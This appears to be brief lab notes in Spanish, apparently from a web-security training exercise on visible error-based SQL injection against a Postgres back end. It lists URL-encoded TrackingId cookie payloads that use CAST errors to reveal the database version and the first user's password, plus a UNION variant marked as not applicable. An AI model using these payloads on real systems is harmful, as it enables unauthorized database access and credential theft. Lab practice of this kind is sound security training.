13 - Visible error-based SQL injection

Postgres encontrado

TrackingId='+AND+1=CAST((SELECT+version()+FROM+users+LIMIT+1)+AS+int)--+-

La contraseña del primer usuario se leakea con esta query

TrackingId='+AND+1=CAST((SELECT+password+FROM+users+LIMIT+1)+AS+int)--+-

O de otra forma (NO APLICA)

TrackingId='+UNION+SELECT+1=CAST((SELECT+password+FROM+users+LIMIT+1)+AS+int)--+-